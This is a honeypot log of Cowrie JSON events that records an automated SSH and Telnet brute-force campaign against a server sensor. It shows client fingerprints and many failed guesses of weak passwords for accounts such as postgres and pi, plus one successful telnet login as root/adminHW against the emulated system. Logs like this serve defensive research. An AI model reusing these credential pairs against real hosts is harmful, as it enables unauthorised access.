{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:53:48.589250Z","src_ip":"212.227.125.160","session":"406970019554"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456789","message":"login attempt [postgres/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:53:49.288102Z","src_ip":"212.227.125.160","session":"406970019554"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:53:50.463779Z","src_ip":"212.227.125.160","session":"406970019554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47291,"dst_ip":"1.2.3.4","dst_port":22,"session":"a236c192dc2e","protocol":"ssh","message":"New connection: 212.227.235.229:47291 (1.2.3.4:22) [session: a236c192dc2e]","sensor":"my-vps","timestamp":"2025-08-28T11:54:09.688227Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45044,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f0890582478","protocol":"telnet","message":"New connection: 212.227.125.160:45044 (1.2.3.4:23) [session: 4f0890582478]","sensor":"my-vps","timestamp":"2025-08-28T11:54:25.858282Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:54:25.943792Z","src_ip":"212.227.125.160","session":"4f0890582478"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:54:25.959912Z","src_ip":"212.227.125.160","session":"4f0890582478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51402,"dst_ip":"1.2.3.4","dst_port":22,"session":"f940097c8dce","protocol":"ssh","message":"New connection: 212.227.125.160:51402 (1.2.3.4:22) [session: f940097c8dce]","sensor":"my-vps","timestamp":"2025-08-28T11:54:27.641291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:54:27.642298Z","src_ip":"212.227.125.160","session":"f940097c8dce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:54:27.817026Z","src_ip":"212.227.125.160","session":"f940097c8dce"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345","message":"login attempt [postgres/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:54:28.461162Z","src_ip":"212.227.125.160","session":"f940097c8dce"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:54:29.736965Z","src_ip":"212.227.125.160","session":"f940097c8dce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57800,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ebf372e9e63","protocol":"ssh","message":"New connection: 212.227.125.160:57800 (1.2.3.4:22) [session: 2ebf372e9e63]","sensor":"my-vps","timestamp":"2025-08-28T11:55:09.106291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:55:09.107318Z","src_ip":"212.227.125.160","session":"2ebf372e9e63"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:55:09.446011Z","src_ip":"212.227.125.160","session":"2ebf372e9e63"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345678","message":"login attempt [postgres/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:55:10.005615Z","src_ip":"212.227.125.160","session":"2ebf372e9e63"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:55:11.198840Z","src_ip":"212.227.125.160","session":"2ebf372e9e63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35834,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f2bf5291e8c","protocol":"ssh","message":"New connection: 212.227.125.160:35834 (1.2.3.4:22) [session: 4f2bf5291e8c]","sensor":"my-vps","timestamp":"2025-08-28T11:55:24.185477Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55428,"dst_ip":"1.2.3.4","dst_port":22,"session":"32940e9371f0","protocol":"ssh","message":"New connection: 212.227.125.160:55428 (1.2.3.4:22) [session: 32940e9371f0]","sensor":"my-vps","timestamp":"2025-08-28T11:55:51.670706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:55:51.671787Z","src_ip":"212.227.125.160","session":"32940e9371f0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:55:51.850697Z","src_ip":"212.227.125.160","session":"32940e9371f0"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty","message":"login attempt [postgres/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:55:52.394894Z","src_ip":"212.227.125.160","session":"32940e9371f0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:55:53.584571Z","src_ip":"212.227.125.160","session":"32940e9371f0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:56:09.705887Z","src_ip":"212.227.235.229","session":"a236c192dc2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47268,"dst_ip":"1.2.3.4","dst_port":22,"session":"30807956a8ce","protocol":"ssh","message":"New connection: 212.227.125.160:47268 (1.2.3.4:22) [session: 30807956a8ce]","sensor":"my-vps","timestamp":"2025-08-28T11:56:34.198028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:56:34.214368Z","src_ip":"212.227.125.160","session":"30807956a8ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:56:34.370024Z","src_ip":"212.227.125.160","session":"30807956a8ce"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123123","message":"login attempt [postgres/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:56:35.645415Z","src_ip":"212.227.125.160","session":"30807956a8ce"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:56:36.884378Z","src_ip":"212.227.125.160","session":"30807956a8ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43846,"dst_ip":"1.2.3.4","dst_port":22,"session":"1417ae173d3e","protocol":"ssh","message":"New connection: 212.227.125.160:43846 (1.2.3.4:22) [session: 1417ae173d3e]","sensor":"my-vps","timestamp":"2025-08-28T11:57:17.202716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:57:17.213305Z","src_ip":"212.227.125.160","session":"1417ae173d3e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:57:17.379435Z","src_ip":"212.227.125.160","session":"1417ae173d3e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"111111","message":"login attempt [postgres/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:57:18.324309Z","src_ip":"212.227.125.160","session":"1417ae173d3e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:57:19.697734Z","src_ip":"212.227.125.160","session":"1417ae173d3e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:57:24.191421Z","src_ip":"212.227.125.160","session":"4f2bf5291e8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:57:25.962711Z","src_ip":"212.227.125.160","session":"4f0890582478"}
{"eventid":"cowrie.session.closed","duration":180.10732746124268,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:57:25.965511Z","src_ip":"212.227.125.160","session":"4f0890582478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58920,"dst_ip":"1.2.3.4","dst_port":22,"session":"58223844c4d0","protocol":"ssh","message":"New connection: 212.227.125.160:58920 (1.2.3.4:22) [session: 58223844c4d0]","sensor":"my-vps","timestamp":"2025-08-28T11:57:56.229008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:57:56.230021Z","src_ip":"212.227.125.160","session":"58223844c4d0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:57:56.289837Z","src_ip":"212.227.125.160","session":"58223844c4d0"}
{"eventid":"cowrie.login.failed","username":"solv","password":"12345678","message":"login attempt [solv/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:57:56.471826Z","src_ip":"212.227.125.160","session":"58223844c4d0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:57:57.533460Z","src_ip":"212.227.125.160","session":"58223844c4d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47644,"dst_ip":"1.2.3.4","dst_port":22,"session":"56bb57cedd8b","protocol":"ssh","message":"New connection: 212.227.125.160:47644 (1.2.3.4:22) [session: 56bb57cedd8b]","sensor":"my-vps","timestamp":"2025-08-28T11:57:57.808074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:57:57.903956Z","src_ip":"212.227.125.160","session":"56bb57cedd8b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:57:58.108575Z","src_ip":"212.227.125.160","session":"56bb57cedd8b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234567","message":"login attempt [postgres/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T11:57:58.893605Z","src_ip":"212.227.125.160","session":"56bb57cedd8b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:58:00.058349Z","src_ip":"212.227.125.160","session":"56bb57cedd8b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55900,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bbd606229d2","protocol":"ssh","message":"New connection: 217.72.205.35:55900 (1.2.3.4:22) [session: 9bbd606229d2]","sensor":"my-vps","timestamp":"2025-08-28T11:58:28.948217Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:58:28.949353Z","src_ip":"217.72.205.35","session":"9bbd606229d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57008,"dst_ip":"1.2.3.4","dst_port":22,"session":"eef273250b7f","protocol":"ssh","message":"New connection: 212.227.125.160:57008 (1.2.3.4:22) [session: eef273250b7f]","sensor":"my-vps","timestamp":"2025-08-28T11:58:37.914949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:58:37.919920Z","src_ip":"212.227.125.160","session":"eef273250b7f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:58:38.082170Z","src_ip":"212.227.125.160","session":"eef273250b7f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:58:38.779386Z","src_ip":"212.227.125.160","session":"eef273250b7f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:58:39.994975Z","src_ip":"212.227.125.160","session":"eef273250b7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33424,"dst_ip":"1.2.3.4","dst_port":23,"session":"503d6a8daa90","protocol":"telnet","message":"New connection: 212.227.125.160:33424 (1.2.3.4:23) [session: 503d6a8daa90]","sensor":"my-vps","timestamp":"2025-08-28T11:58:54.964098Z"}
